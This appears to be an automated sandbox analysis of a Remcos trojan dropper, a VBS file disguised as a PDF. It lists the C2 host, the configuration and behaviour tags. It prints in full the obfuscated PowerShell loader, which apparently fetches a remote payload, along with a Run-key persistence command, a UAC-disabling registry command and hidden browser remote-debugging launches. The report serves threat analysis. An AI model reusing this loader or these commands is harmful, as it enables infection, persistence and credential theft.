Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2024 15:41

General

  • Target

    FE_50602072400310161019800100024010042047501200000000·pdf.vbs

  • Size

    33KB

  • MD5

    d6f45ebf3891c5dbabcc90063267a500

  • SHA1

    e5943a4dcacd697d58287bf70e45cf054015e881

  • SHA256

    1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962

  • SHA512

    25952f18ea9a949b745de4822e9a6830ea6c16d643d996db9275f8be7bc10be70a40581b48034be5ebd07720f229b54b38b7effa4e274c9a795314669a388cff

  • SSDEEP

    768:YNdasoF+ZTskr3M28uNK7Rkc94VhNxLKe9KhZh9H5u7jCx4GVVBXgdrnGu:6dasOaAkrHoNYjbU/z9jQdCu

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FE_50602072400310161019800100024010042047501200000000·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4948
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2104
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2252
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2620
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffda71cc40,0x7fffda71cc4c,0x7fffda71cc58
          4⤵
            PID:3888
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2024,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2
            4⤵
              PID:4424
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1928,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1716 /prefetch:3
              4⤵
                PID:1324
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8
                4⤵
                  PID:1384
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2932
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:468
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,832908560117431819,7235681801375558110,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4412
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\viqlkhghvufnmugbuvbgdyb"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4220
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcvdlzrbrcxapauflgwholwirl"
                3⤵
                  PID:1544
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcvdlzrbrcxapauflgwholwirl"
                  3⤵
                  • Accesses Microsoft Outlook accounts
                  • System Location Discovery: System Language Discovery
                  PID:4524
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qebwdrbcfkpfzgqrvrjbrqqrsrmhk"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1580
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  3⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies registry class
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  PID:4380
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
